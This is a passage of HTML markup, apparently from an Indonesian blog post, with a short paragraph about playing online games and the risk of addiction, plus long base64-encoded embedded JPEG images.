src=&quot;data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQQEBUQEhQUFRUVFBQUFRQUFBAUEBQVFBAVFBQQFBQXHCYeFxkjGRQUHy8gIycpLCwsFR4xNTAqNSYrLCkBCQoKDgwOGg8PGi8kHyUuKiwqLCwpLCwsKS0sLCksKSwsLCwsLCwpLCwsLCwsKSwsLCwsLCwpKSwsLCkpLCksLP/AABEIAKgBLAMBIgACEQEDEQH/xAAcAAAABwEBAAAAAAAAAAAAAAAAAQIDBQYHBAj/xAA+EAABAwIEAgcFBQcEAwAAAAABAAIDBBEFBiExEkEHE1FhcYGRFCIyQrFScqHB0RUjM0NigvAkorLhFlNz/8QAGwEAAgMBAQEAAAAAAAAAAAAAAAECAwQGBQf/xAAvEQACAgIBAwMDAwMFAQAAAAAAAQIDBBEhEjFBBRNRIjJhFIGhM0JxIyRSkbEG/9oADAMBAAIRAxEAPwCPDA7cLrjautuFtKcbhPYSobDQywoMpgXcRXSMLd2pYoXjvT2R0KjUDiNJNHUdfE0O4hYgqeELxu1LDjzBUtiI7B4JLmSVrQ47WGw8VKVsvDE92ujTtvsja8J0EFMTMfr8ELo2zOLusllsAb3A4t1q+B0pihYwm9mj6LpNKw7tBtqNAni3RNvYh50pZFcbuNh5qIhwfhEsj3EuAJGpuFPvp2yRhl7dh7D2rijy+8yF7pbgixAG4UQ0O4RiBFNG+U2JsLnmTspJmJxa++33TZ2o0PYVGZkwiSSmEcFg4OaRfYWKr1NlGYTStfcxFvHe+r5OHXySJPZfWTNNiCDfbUJdgVlkdPWMdTu4Xgniha0Xs0X/AIjvJLr8RqKY1EEbn/u+CR0huQG/MATzOqehbNQMIO4CI0rexV3Bsaead9VKfd4eJjDa/C0b+aZmzDUMbTye4eveAWWN2sI4uIHwQLaLP7C3vHmUPYzycfOxUE/NruqNSIgYQ4NvxWeRxcJeAuyTNTAHuax72xi8jmjRul7d5sgNo73Uju1p8QmJcKDviiid5NRHM0FmnivxN4wACSG2vxEDZcFdmtrjTilcx4ml4SdwGNBLz46J8i0gT5TpnfFSt/tsPoo+fIVGfkmZ910llcIqlriQ1zSRuAQU9ZSU5LyJwi/Bns3R1A74KiVv3uF31Cjqjotef4dUw/fZ+YK1Ixg7hINM07tHopq6a8kHTH4Mem6Mq1vwmF/9xafxC4Z8j1zN6cu+49jvzC2s4ezst4Ej80k4f2PePMH6qSvkRdKMGnwaoj+Onmb/AGEj8FyONviDm/ea4fUL0F7G8bP9WhMyUbzuIneIU1kMi6EYEJmn5h6pYK2upwKN/wAdLE7yZ+ii6nI9E7ekLfuXb/xKmsj8EfYMqCNaDP0dUR2fURf3OI/3Arjf0aR/JWP7g5sZ9dlL30R9mRSkZVql6M6gfBUQv+81wPqCuGXIdc35InfdkIPoQpe7B+SLqkiEsgP81UhNlqsZ8VM8/dLHfmuV1FMDY08wP/zKl1x+SPRL4NEYE+wJtgT7AvGR7I40J5oSGBPNCZEU1qcEY7EGhOtCAG/ZGnkEX7MYeS6WpxoTFo4ThDeRISThJ5O9QpMBKAT2RcURH7NeOwodRIPlPkVMgJQCexdJCid4+0PJONxJw5jzCl+FAwNO4HojYtMjm4lfcNPmjfPG+4fGDxaO0BuOwrrdh7D8oSDhDOVx4FPaDk4K2OIsPDGHHh4OE6At5hRFDgLX1LJXXZHEwsZG5/Fq4anuFlYzhHY8+aQcLf8AaafEFPgi9nBFlJvA2HrXGFruIR6dtw0nmAU03K0zI5YI3s6uV7nFxB6xrXfE3vUi6hkHyg+Bsi4pG/LIPDVAuCszwvw5tTKxjZWmMNjIe27S1vD1ZHjr5qJky9UsgaY43AxUpILRvJK68nCO0BW/2OPi4i0Xvxe83S/bba6k48TPa0+oQkG0VnBqFkMsVQZuEMjETm9U9hc55FuM8zf6rpw6oNVPUmaRzOqf1ccbXlhADQestzJVi/aPawHwI/NNvMLnCR8Pvfa4Wl2m2oTAq0eKzvoJq3ryws4xFHZpaercWtD76kut+KehzTVSzSNZ1TGQ0zJJC9pJ6xzSSwa6DT8VNDBqIu4uAC7uMt98MLt+It2ulOy7TuZUMY8tNT/EcHAu2DfdvsLBAEHh+e53R0ks0DA2qeGANeS9t2k8duY0V1D+5Qc2UGOkpXB/uUoPCy1+I8HCHE8tLqe6tA1sARWR2QskSEFFZLREJgNkJmSnad2tPiAuiyIhAzidh8f2R5afRNOwxvIuHg4qQISHBAtEa7DyNpHefCU2aN//ALB5t1+qknBIIQLRWWBdDGpqMLoYFSaRxrU80JtoTrQgixbQnWhIaE60IEKATjQiASwmIMBLsiASgEAABKAQARgJiBZKAQASrIAIBKsgAlBAgWQsjQTAACUAhZGmISWBNvomO3a30CfAR2QGjhOER/Zt4EhIODN5PcPxUkAhZPZHpREuwh/KQebf0UbjT3UsRmka1zQQPd1cbm2gsrQovEmdZUQQnUcTpXDlZgsPxKkmRcV4I6Fhc0PawkEAgsdy8AUftbm85W+IJH4hEwew1XUm/UzkuiPJrvmi/MKxNTfAktkA3FXD+aP7mhPNxV/9B8CQpZ8DXbtB8QFzSYRE7UsHlp9EtoemczcWPOM+Tmn62Sv2wzm14/tJHqEH4EzkXt8HH800cEI2ld5gFPgPqR0NxOI/OPO4+qdbM07OafAhRz8KlGzmO8QQud+Gyc4mnwIRpB1P4JshIIUE6Jzf5crful35FI/aJb/Me37w/UI6R9ZOuCQokYq7k9h8R+hSv2m/7LPUpaDqRHxhPsCaYlyTBjS5xsAqEtvg0t67nSFH4hmWGD4nC/ZzVOzHndxPVxeFxuUxgeTZKm0kxIB1tzW9Y0a11XP9jK7HJ6gTVR0mMBsxhcmm9J7hvCbKxYflKCICzAe8jVSX7ChIsY2+gUfdpXCh/I+ifyV2i6T4HGzgW+KtGG47DOLxvB7r6qv4z0dwTNJYOB3IhZtXUc1BNwElpGzhoCFpqpoyOI8MhKU4dzewlgLM8pdI93CGoOp0D+3xWlRSAgELFfjzplqRdGaktiwEoBAJQWcmABKshZGAmJgAQARgJQTEEAjAQsjTEABHZBGAgAWRowEYQAVkEpBABKuY9hdU6V0tPI1l4uAaXe03vdvLX8lZEmyknoi1szqgopqqpvO6WzercAS4NbI0WdZu2+vmr9E2wATpaN0ZCG9gloJEjRIJAISbJVkLIAQUVksorIAQQm3NB3sU8QkEIEcctBG7djT5BcxwaL7A9SpIhNkI2w0isDQXVCzfmUuJjafdH4qxZqxXqYbD4naBZxSUxqKhsfa7Xw5rdhVKMXbL9iu6XVLoRZsj5Z60+0SjT5QfqtKgisAAuTDaQRsawDQAD8FJRhYbbHZJtl0Y6XA5G1OtCQ0JxqqJCgqZ0nwRuptW3kv7lhqrqAm5qJj7cTQbbX1Vlc+iSkRlHqWjIMqdHEkxbLNdrQQQOZWw0kHA0NHIWTrIgBYJxoUrbpWPcgUUgAJYCIJSqJBgI0QRoIhhKsiCMJoABKQARgJiAEoJICUgAI7IIwUAABBGisgArIkq6JMAkRCNBMBKCNAIAKyIpSCBbQiyCUiKBiCklLKQ5ADZTZTrkgoEYjnmv4p+Dk0Iujqk453yH5RYKHzBNxTyHvVp6MWe5If6gvWuXRjJIohzPZoMTV1MCYiC6GrxDWONTjU21OtQAsFLaktS2pgKASgiVbzVmoUzSxh9/wCijKSits0Y2PZkTUK1yS+I43DTi8jwO7n6Kt1HSdCDZjHO79lWMBwiXE5TJI49WDud3eHctCocqU8QDRG095F1XFznz2R6N1eLiP22uuXnnSRB03SnCTZ8b29+hVowrH4akXieD3cx4hRWOZGgnjPC0MfbQjtWUtllpJyGksex1j32PMcwVCc51PnlGzFwsX1GDVS6JrxvaN+CMBV/KWYxWQB+z26PHYe1WALTGSkto526mVM3XPuhQCMIrpEtS1vxEBEpKK2ytRb4Q4jso1+Pwg24k7DjMTtnDzVX6mreupFros1vpZ3IAImPB1FilK9PfYpa0BBBBAgrIIFEmALIkCjTAJNzAlp4dDyTtkCECa2tGd5hNdFd7yTHfcac+5V2szg+nbxdY8d1yr5n+q4YWx/aN7dwWL5pdxPbGNyQPU2WS770kctZTGWZ0R3pflmh5IzNX1jxIf4N+bR73mtIa9RGWMNFPSxRtFrMF/GymGhaYrSOjqgoLSDKQ4JZSHKReNuSEtybugDztj7bVEg/qVo6MZ9ZGd4Kis+UBjqOsto/muPKWKez1LXH4Xe6fM6Fey/9bH4+DOvpkbTEuhq5KeS4BGxXU1eEa0O8Vt1xVGYoIjZ0jQfFPVVMJGcB5+qq9Z0bRyEnjdc96uqVf97ZCfX/AGlspsXik+GRp8wu6N4OxusKxuj9jndEHk8PMFdGUZaqpn4Y5Xhrfi10t2L0LMCCh7ilx+SiN0m9aNkxfEBBA6U8hp4rFsZxB0r9Tcvd/wAjYK89IdY5lPFETq46ntsFQcJZ1lXC085B+Gq5vIe5qB33o9SpwpZHl7/g2bLOGCnpo4wPlF/EhTLAmYBoF0Bb0tcHGzk5ScmHZZB0lUgjriR87AVsAWT9Kzv9Wwdkf5rPk/02e7/882sz9mc3RjifV1hi5SN27281sTCsEyG4nE4rcuInwsttxCr6tluZVddiqpcpdkL1mHuZmo+RGKYuIwbHbc8gqzSxTV7iQSyO9uI7u8FxYvMZpWU4+Zw4vDmr9QUgiY1jRYAALHip5cnZZ28Iy5CWLBRj9z8kJHkiG3vFzj2ly5q7KroBxxOJaN2nU+StwCMi+69Oyiucelo8+u+yuXUmUugxd0diDcc28lbqOsbIwPbsf8sqXidP1U72cibjzXRlPErTOhJ0dqPFeLhXSpudMntHt5mLG2n3oLnuXMI0kKr5nzq2muyOznjc8gunppndLpgjmLLY1rci0FySJB2j1CymmdXYiS4PcGX5HhanK3I9ZE3jZI5xGtuJ11reJXGXTOzn/BV702tqJqlkFiFNm+qiJaZXtLdCDra3LVSUHSfWN+VkgH9NvWyvn6Tal1JpoUcpN6aNeQsqBl7pMlqH8Dqa3a4OsPQq+slBAPddedbVKp6kaFNNbM/6QKy84Z9lv1WbYdTe04pFHyDwT4BWvNVfxzSvvzIHloo3oko+tr5Zjsxuh7yV5r+q1nPYC9y+dr+TaY22AHYE4ETUZWw6JBOTbkspDkEhDk2UtybKYGf5lwUVUJb8w1b4rJqiF0Tyx4II/VbkxQ+PZSjqhewDraOCuxsl1cPsFleyKyRnFpaIJXWIsGuOx7itBifcXCxPEclVEBu0cQGxC68LzhV0tmua5zRycDf1V9tNd31VvX4K4ylDhm0NRyycLS47AXWeUvSu23vwuB7k1i/Sk2SJzI4n3cCL9l1RHEs3ySlatFPzFW9ZNJIfmcfRX/okwzgp3TEavd+AWUPEkjgA12pA2PMr0Dlag6mljj7Gi/jZb8+5OChErphrllb6VYj1cL+QcR6hUjLb7VsB/r+oK1vN+De1Uj4x8QHE3xGqxGnqHRyAkEOjcCRzu06hcvkR1NTO69JvjbiSx/PP8nouJPBRuCYi2eFkjTcFo9eYUkFu3s5CcXCTi/ApYl0iYiH1shvo0BvputXzLjrKSB0jjrYho5klYE9klbUdXHcue4lx5C51Kz3/AFagjofR0seM8mfxpFu6H8KMlTJUke60cLT3nf8AJaDjdReUj7IXRlLLzaKmZC3ew4j2nmVEY1Jad4P+aLB6knGhJfJnxZ/qMpzZw5Zj6yvLj8rStEaqFkkf6qT7v5q/tWr05apRm9Wf+41+EGEaCC3nlMqOaB++v/Sq1g1VavjtzdZWDNE461x7BZVjKEZmxAEbMuSubUevLbXydhXqGC3L/iXrN+N+zQXB99/ut/MrJHk1E7Irk8bhftOuqt3SlVESxM5cJPndVfKR4sRhv9pfTsKpVYjsXdpnzuf138+DZsMoWwxtY0WAAC7AETUsLmG9vZ6ZknSlg4iqWTNFusGttrhQGTsQ6itYHAFkh4HA6jXYq99LTQY4u3iP0WXUdzUxAb9Yz/lquuxX7mFqfwzzu1rS+T0NTYdGzVrGjwAQxacRwSP7Gn6J6D4R4BQWe6zgpSObiB5c1yLetsvy59FEn+DIMw1No3Htv+KuXQth3DSvmO8jz6DRZ3mie4DQttyNhvUUELOfACfE6rFQtvZh9Lr6a9lgCKR4AuSABuTskVNS2Nhe42AFyVlebs5vlJa0kMvYNG7tdLrRZYoLk6rA9OnlvjiK7sumK56poNOLiPY39VAydKzL6REjxC48sZA61omqb66hn6q1f+H01uHqx+aglZJb3o0TswaJdEYOevLev+iKpOkynfo8OZ37j1Vip8UikaHse0g96z/N2RRA0zQ/CPib2d6pbZ3N0a4gdxsFTO6dT1JbPVp9Kxc+tWUNx+V30atGV0MK5oyuhhWg5YfAB3SH4ZE/4mNPkEtpTzExaOI5Zpz/AC2+iVHlWnH8tvopJpTjU+pi0jkiwCFu0bfQKRYy2gQalhLYaFgKh5z6OBUOM8Fmycxycr4EsJNJrTLK7Z1S6oPTMVwjFa7C3FhjcWX1bYlviDyVgf0uScNm0zuLvBstIfTNd8TQfEJtuExXv1bfQKKr1wmbpZ6sfVZWm/kxubD6/FpA54LW8rizQO4LR8oZHioWXAvId3HdWeOEDYAeCcspRgomfIy7LuHwvhdgmtVKzxAY5GyjZwsfJXhceLYY2oiMbuY07jbdV5FKug4iw8j9Pap+PJRsrVQbUtdyd7vnyWjNWRVlFLRS2cDYG4d4bK84Fm2OVgD3Brh6FYMOfsbqs4+D1vU6Pf1fTyvOizFIllDWlx2C5ZMXiaLl7fVU3NGdA4dVFr4blbLsmMI/S9vweXj4VlsuVpeWyGzbjFy4Ddx/wKxdHWAmGHrnj3pNddwFD5Yya+eQVFQNL3DTzWkRxgCw0A07lRhYrh9c+5u9RzYyiqKuy7v5KJ0q4UXRMqGj4DZ33Ss5wfEeqqI5fsuBPhfVb/VUzZGGNwu0ixB2WT5k6MZI3l9P7zCb8J3HguxwM2Cr9mzscvbU1LqRq9JOJGNe03DgCCO8LoCyTL2ZqmgaIZG3aNmuvceB7F24r0nyFvBGwNJ0ve517Fmfptjl9DTj8gsqK41yM9K2MNdI2IH4Br4lQXRxl51TVCdw9xhuO88l24RkSauf1s5IaTfXcrVMHwZlNGI4xYBX5GXGqn9PU9/LCmp765dzvYFQ+kms96OPsBcfor6AsmzxW8dTIeTfdHkFz1z1BmP1aeq1D5ZRXQ9fXQxDnI2/he69EU0XCxrewAfgsP6N6Lr8T4ztGCfM7LdLqNC0jbiQ6a0ijdION6inadhd35BUvK9D7VXsadWs94+WyXmSu46mV39RHpohkR0wmlfCG8QaPiBPNY5S67+T6ZZSsT03pjw2v/TY2tsLDkm5ahrB7zgPEgLOMQrcUeeECwP2BZcIybXTm8jj5klb3OXhHJRxMdLqsuX+FyW3M+b6ZkMjOMPc5pFhrqVismJgFaRTdFIP8WQnw2UlH0Y0oFiLqqdcrPuNlPqVWHFxx9vfds7YyuhhXIwp9hVh4h1sTzVzMKfaUAdLE81c7SnWlAD7SnAUy0pxpTEPBKCbanAgQsJbUgJQTQCwlJAKUmIUEaII7piGKuhZK3he0Ed6rlX0fxON2FzPDZWoIKEoKXDRONk4fa9FMHR52yut2KUwzJsEBvw8R7XaqfQSjVCPZEp32T4lJsQ1ltAlIEquY1nWKnuG++f9q1VUztfTBGWy2NfMmWRBZbP0j1MhtE0eQug3NeJbhv8AtWx+nzj90kv3Klkb7RY10iyH2y2wDRb9VCZTEbq+MTW4Ttfa/JN5mxSrqHCSaKxaLcTQRp3qDhqr67Eag810dEIzx/aTW9a4MXS4z6z0hGwAWGycCpvR9mz2qLqpD+9jHm5v2lcgVyN9MqZuEj04SUltDdVNwMc7sBP4LCcwVdw9/aSfValnnMcVPTujc8B7hYC+uvNYni2KskaWtKw5HhHh5u7b4pdl3Lx0KUHuzTn5ncIPcP8Au61J2x8FUOi2kazD4+GxJ1Nu0nmrira+Int1PSWjBMVJ66UHfrHfVTvRbUhtXIw/OzT+0rgz3QGCtkHJ/vjz3UXgmJez1Ecw2a7X7p0K8yT9u7n5Pp9yWbgah5ibykuTNNVCRjXtNw4XCW5y9ZcnzVpxemJcmilOKaJTEVmNy6I3IIKktOhhXQwoIIAfYU60oIIAdaU61EgmIdBTgKJBAhYKWCggpAKulXQQTEw7o0EECAEdkEEABBBBMRU884/1LBC02c8XJ2NlnFHSvrKlsI2vdx7kEF01CVWG5w76PK/qXvqNbwfLUNO0BrRe2p3Us2Edg9EEFzkm3yz1EhMtEx4s5rSDpqAsbz9k32OXrox+6eeXyu7EaC3enWyhckvJRfFdOyBwPFXUtTHM3k4A94JsQvQME3E0OGxAPqggvQ9aitxl5IY/ZkHmLJcFcbyt17eao+JdCDDrE8jzRoLnmk3yXOEV2OPD8jYlROAgmIbfXmPRadhHWiJomdxP5mwF0SCNJdgjBLlFe6QstGrg42D95Hq3vHNqxrry1xa4EEaEHcIkFlyYJrZ1HouZbHde+C5ZOzx7N+6lJdEdjuWf9LS6TFY5mh0b2uHcQggoY039pq9Yw63H31w33HXOXO6oaDqR6hBBb9HMQrUj/9k=&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
2.&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt; Main Game Online&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;
Main Game juga termasuk dalam kegiatan seseorang yang dilakukan ketika 
sedang online dengan jaringan internet. dengan main game online ini 
lebih menyenangkan karena melibatkan banyak orang yang melakukan 
permainan yang sama namun semua pemain ada di tempat yang berbeda hal 
inilah yang paling menyenangkan pada game online. game online ini 
menyebabkan kecanduan jika tidak pandai pandai dalam memenegement waktu.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img src=&quot;data:image/jpeg;base64,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